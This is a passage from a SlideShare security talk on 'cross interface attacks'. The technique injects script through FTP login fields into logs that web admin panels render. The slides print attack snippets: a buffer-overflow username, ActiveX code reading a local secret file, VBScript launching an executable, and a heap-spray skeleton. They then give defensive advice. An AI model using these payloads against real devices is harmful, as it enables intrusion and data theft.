SlideShare a Scribd company logo
CROSS INTERFACE ATTACKPiyush MittalSecurity Compass
IntroductionWhen 1 interface is used to attack the other interface.
Different from XSSXSS - Entry point is from web to webCIA - Entry point is from backend login console to web interface
CIA CharacteristicsExploits the default nature of FTP /Telnet ProtocolAdmin interfaces : { Web, FTP, Telnet}Logging module running as rootDOM and HTML rendered as dynamic contentAttacks are persistent in natureHardware devices – firewalls, disk stations, management systems etc.
Truth About FTPThe default design of FTP allows the acceptance of both username and password prior to the authentication process and complete verification.No check on no of login attempts. No check on type of characters.
Old Buffer Trickroot@redux$ ftp example.comConnected to example.com.220 Disk Station FTP server at DiskStation ready.User (example.com:(none)):AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA331 Password required forAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.Password:530 Login incorrect.Login failed.
Design of the ApplicationFTP  LOGININTERFACEI
Design of the ApplicationFTP  LOGININTERFACEInject PayloadI
Design of the ApplicationFTPAuthenticationModuleFTP  LOGININTERFACEInject PayloadI
Design of the ApplicationFTPAuthenticationModuleFTP  LOGININTERFACEFTP Logging ModuleInject PayloadI
Design of the ApplicationFTPAuthenticationModuleFTP Logging module run as root or administratorFTP  LOGININTERFACEFTP Logging ModuleInject PayloadI
Design of the ApplicationFTPAuthenticationModuleFTP Logging module run as root or administratorFTP  LOGININTERFACEFTP Logging ModuleInject PayloadWeb InterfaceI
Design of the ApplicationFTPAuthenticationModuleFTP Logging module run as root or administratorFTP  LOGININTERFACEFTP Logging ModuleUnencoded/Unfiltered HTML renderingInject PayloadWeb InterfaceI
THREATSInformation Stealing                                                Sample code
THREATS      Cookie Stealing
THREATSMalware Infections - Executing payloads to conduct Drive by Download Attacks                                                 Sample code
THREATS      Drive by Download Attack
THREATSCSRF                                               Sample codeTuning Network device into attack pot
Advanced Code InjectionsActive X code executionvarfso = new ActiveXObject(”Scripting.FileSystemObject”);XFile = fso.GetFile(”c:/business/secret.txt”);stream = XFile.OpenAsTextStream(1, 0);var content = stream.ReadAll();
Advanced Code InjectionsVBScript code execution<object classid=’clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8’ id=’target’ ></object> <script language=’vbscript’>arg1=”c:/WINDOWS/system32/calc.exe”target.Exec arg1</script>
Advanced Code InjectionsHeap Spray code executionvarshellcode = unescape(””);var heap block=unescape(”%u0a0a%u0a0a”);varnop sled= unescape(”%u09090%u09090%u09090”)do {heap_block += heap_block;} while (heap_block.length < xxxx)var memory = new Array();for (ret=0; ret <100; ret++){ memory[ret] += heap_block+nop_sled+shellcode; }
Advanced Code InjectionsAJAX code execution
DEFENSEA whitelist approach should be followed at the protocol level to reduce the impact of exploitation.The error reporting mechanism should be used in conjunction with the FTP authentication module to restrict the acceptance of malicious input through login consoles.The logging process should not run as administrator or root user.The logs should be rendered in a customized format which does not allow DOM and HTML elements to get rendered as dynamic content. The content should be sniffed to avoid the usage of malicious input thereby defining the Content-Type appropriately.
???????When In doubt, its better to ask
Referenceshttp://www.google.co.in/search?q=https%3A%2F%2Fblue-sea-697d.quartiers047.workers.dev%3A443%2Fhttp%2Fmilw0rm.com%2Fexploits%2F6476&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a#sclient=psy-ab&hl=en&client=firefox-a&rls=org.mozilla:en-US%3Aofficial&source=hp&q=cross+interface+attack&pbx=1&oq=cross+interface+attack&aq=f&aqi=&aql=&gs_sm=e&gs_upl=37279l38938l11l40023l2l2l0l0l0l0l268l492l2-2l2l0&bav=on.2,or.r_gc.r_pw.&fp=a0ba24de15e40bac&biw=1366&bih=558http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2453http://www.securityfocus.com/archive/1/archive/1/513970/100/0/threaded
THANKS

More Related Content

PPT
Root via XSS
Positive Hack Days
 
PPTX
Post XSS Exploitation : Advanced Attacks and Remedies
Adwiteeya Agrawal
 
PDF
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
PPTX
OWASP San Diego Training Presentation
owaspsd
 
PPTX
0xsp mongoose RED - DragonCon HK
Lawrence Amer
 
PPTX
BlueHat v17 || Betraying the BIOS: Where the Guardians of the BIOS are Failing
BlueHat Security Conference
 
PDF
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
Root via XSS
Positive Hack Days
 
Post XSS Exploitation : Advanced Attacks and Remedies
Adwiteeya Agrawal
 
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
OWASP San Diego Training Presentation
owaspsd
 
0xsp mongoose RED - DragonCon HK
Lawrence Amer
 
BlueHat v17 || Betraying the BIOS: Where the Guardians of the BIOS are Failing
BlueHat Security Conference
 
Hunting for security bugs in AEM webapps
Mikhail Egorov
 

What's hot (20)

PPTX
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
Eric Vanderburg
 
PDF
Hack proof your ASP NET Applications
Sarvesh Kushwaha
 
PPTX
MITM Attacks on HTTPS: Another Perspective
GreenD0g
 
PPT
Denis Baranov: Root via XSS
qqlan
 
PPTX
Browser exploit framework
Prashanth Sivarajan
 
PDF
Defending Against Application DoS attacks
Roberto Suggi Liverani
 
PDF
Shellcoding in linux
Ajin Abraham
 
PPTX
BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...
BlueHat Security Conference
 
PDF
Owasp AppSecEU 2015 - BeEF Session
Bart Leppens
 
PDF
Html5 hacking
Iftach Ian Amit
 
PPTX
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
EC-Council
 
PPT
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Jeremiah Grossman
 
PPT
Google chrome sandbox
Nephi Johnson
 
PPTX
Advanced Client Side Exploitation Using BeEF
1N3
 
PDF
Local File Inclusion to Remote Code Execution
n|u - The Open Security Community
 
PDF
CNIT 124 Ch10-12: Local Exploits through Bypassing AV
Sam Bowne
 
PDF
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
CODE BLUE
 
PPTX
File inclusion
AaftabKhan14
 
PDF
CNIT 124: Ch 8: Exploitation
Sam Bowne
 
PDF
Window Shopping Browser - Bug Hunting in 2012
Roberto Suggi Liverani
 
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
Eric Vanderburg
 
Hack proof your ASP NET Applications
Sarvesh Kushwaha
 
MITM Attacks on HTTPS: Another Perspective
GreenD0g
 
Denis Baranov: Root via XSS
qqlan
 
Browser exploit framework
Prashanth Sivarajan
 
Defending Against Application DoS attacks
Roberto Suggi Liverani
 
Shellcoding in linux
Ajin Abraham
 
BlueHat v17 || Mitigations for the Masses: From EMET to Windows Defender Exp...
BlueHat Security Conference
 
Owasp AppSecEU 2015 - BeEF Session
Bart Leppens
 
Html5 hacking
Iftach Ian Amit
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
EC-Council
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Jeremiah Grossman
 
Google chrome sandbox
Nephi Johnson
 
Advanced Client Side Exploitation Using BeEF
1N3
 
Local File Inclusion to Remote Code Execution
n|u - The Open Security Community
 
CNIT 124 Ch10-12: Local Exploits through Bypassing AV
Sam Bowne
 
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
CODE BLUE
 
File inclusion
AaftabKhan14
 
CNIT 124: Ch 8: Exploitation
Sam Bowne
 
Window Shopping Browser - Bug Hunting in 2012
Roberto Suggi Liverani
 
Ad

Similar to Cross interface attack (20)

PDF
The Dark Side of PowerShell by George Dobrea
EC-Council
 
PDF
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
CODE BLUE
 
PPT
Web Application Security: The Land that Information Security Forgot
Jeremiah Grossman
 
PDF
Penetration testing web application web application (in) security
Nahidul Kibria
 
ODP
Cracking Into Embedded Devices - HACK.LU 2K8
guest441c58b71
 
PPS
Workshop on BackTrack live CD
amiable_indian
 
PPT
Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
PPT
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
 
PPTX
Everybody loves html5,h4ck3rs too
Nahidul Kibria
 
PPT
Web Attacks - Top threats - 2010
Shreeraj Shah
 
PPTX
Penetration Testing and Intrusion Detection System
Bikrant Gautam
 
PPT
Writing Secure Code – Threat Defense
amiable_indian
 
PDF
Ceh v5 module 11 hacking webservers
Vi Tính Hoàng Nam
 
PPTX
Commix
nullowaspmumbai
 
PPTX
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Cenzic
 
PPT
Web Application Security and Release of "WhiteHat Arsenal"
Jeremiah Grossman
 
PPTX
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
EC-Council
 
PPTX
Application and Website Security -- Fundamental Edition
Daniel Owens
 
PPT
Root via XSS
Positive Hack Days
 
ODP
Virtually Pwned
Claudio Criscione
 
The Dark Side of PowerShell by George Dobrea
EC-Council
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
CODE BLUE
 
Web Application Security: The Land that Information Security Forgot
Jeremiah Grossman
 
Penetration testing web application web application (in) security
Nahidul Kibria
 
Cracking Into Embedded Devices - HACK.LU 2K8
guest441c58b71
 
Workshop on BackTrack live CD
amiable_indian
 
Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
 
Everybody loves html5,h4ck3rs too
Nahidul Kibria
 
Web Attacks - Top threats - 2010
Shreeraj Shah
 
Penetration Testing and Intrusion Detection System
Bikrant Gautam
 
Writing Secure Code – Threat Defense
amiable_indian
 
Ceh v5 module 11 hacking webservers
Vi Tính Hoàng Nam
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Cenzic
 
Web Application Security and Release of "WhiteHat Arsenal"
Jeremiah Grossman
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
EC-Council
 
Application and Website Security -- Fundamental Edition
Daniel Owens
 
Root via XSS
Positive Hack Days
 
Virtually Pwned
Claudio Criscione
 
Ad

Recently uploaded (20)

PPTX
Artificial-Intelligence-in-Drug-Discovery by R D Jawarkar.pptx
Rahul Jawarkar
 
PPTX
How to Close Subscription in Odoo 18 - Odoo Slides
Celine George
 
PPTX
family health care settings home visit - unit 6 - chn 1 - gnm 1st year.pptx
Priyanshu Anand
 
DOCX
SAROCES Action-Plan FOR ARAL PROGRAM IN DEPED
Levenmartlacuna1
 
PPTX
20250924 Navigating the Future: How to tell the difference between an emergen...
McGuinness Institute
 
PPTX
Basics and rules of probability with real-life uses
ravatkaran694
 
PPTX
Information Texts_Infographic on Forgetting Curve.pptx
Tata Sevilla
 
PDF
Health-The-Ultimate-Treasure (1).pdf/8th class science curiosity /samyans edu...
Sandeep Swamy
 
PPTX
Continental Accounting in Odoo 18 - Odoo Slides
Celine George
 
PPTX
Command Palatte in Odoo 18.1 Spreadsheet - Odoo Slides
Celine George
 
PPTX
Measures_of_location_-_Averages_and__percentiles_by_DR SURYA K.pptx
Surya Ganesh
 
PPTX
HEALTH CARE DELIVERY SYSTEM - UNIT 2 - GNM 3RD YEAR.pptx
Priyanshu Anand
 
PPTX
Care of patients with elImination deviation.pptx
AneetaSharma15
 
PPTX
HISTORY COLLECTION FOR PSYCHIATRIC PATIENTS.pptx
PoojaSen20
 
PPTX
Python-Application-in-Drug-Design by R D Jawarkar.pptx
Rahul Jawarkar
 
PDF
The Minister of Tourism, Culture and Creative Arts, Abla Dzifa Gomashie has e...
nservice241
 
PPTX
Sonnet 130_ My Mistress’ Eyes Are Nothing Like the Sun By William Shakespear...
DhatriParmar
 
PPTX
Five Point Someone – Chetan Bhagat | Book Summary & Analysis by Bhupesh Kushwaha
Bhupesh Kushwaha
 
PPTX
CARE OF UNCONSCIOUS PATIENTS .pptx
AneetaSharma15
 
PPTX
A Smarter Way to Think About Choosing a College
Cyndy McDonald
 
Artificial-Intelligence-in-Drug-Discovery by R D Jawarkar.pptx
Rahul Jawarkar
 
How to Close Subscription in Odoo 18 - Odoo Slides
Celine George
 
family health care settings home visit - unit 6 - chn 1 - gnm 1st year.pptx
Priyanshu Anand
 
SAROCES Action-Plan FOR ARAL PROGRAM IN DEPED
Levenmartlacuna1
 
20250924 Navigating the Future: How to tell the difference between an emergen...
McGuinness Institute
 
Basics and rules of probability with real-life uses
ravatkaran694
 
Information Texts_Infographic on Forgetting Curve.pptx
Tata Sevilla
 
Health-The-Ultimate-Treasure (1).pdf/8th class science curiosity /samyans edu...
Sandeep Swamy
 
Continental Accounting in Odoo 18 - Odoo Slides
Celine George
 
Command Palatte in Odoo 18.1 Spreadsheet - Odoo Slides
Celine George
 
Measures_of_location_-_Averages_and__percentiles_by_DR SURYA K.pptx
Surya Ganesh
 
HEALTH CARE DELIVERY SYSTEM - UNIT 2 - GNM 3RD YEAR.pptx
Priyanshu Anand
 
Care of patients with elImination deviation.pptx
AneetaSharma15
 
HISTORY COLLECTION FOR PSYCHIATRIC PATIENTS.pptx
PoojaSen20
 
Python-Application-in-Drug-Design by R D Jawarkar.pptx
Rahul Jawarkar
 
The Minister of Tourism, Culture and Creative Arts, Abla Dzifa Gomashie has e...
nservice241
 
Sonnet 130_ My Mistress’ Eyes Are Nothing Like the Sun By William Shakespear...
DhatriParmar
 
Five Point Someone – Chetan Bhagat | Book Summary & Analysis by Bhupesh Kushwaha
Bhupesh Kushwaha
 
CARE OF UNCONSCIOUS PATIENTS .pptx
AneetaSharma15
 
A Smarter Way to Think About Choosing a College
Cyndy McDonald
 

Cross interface attack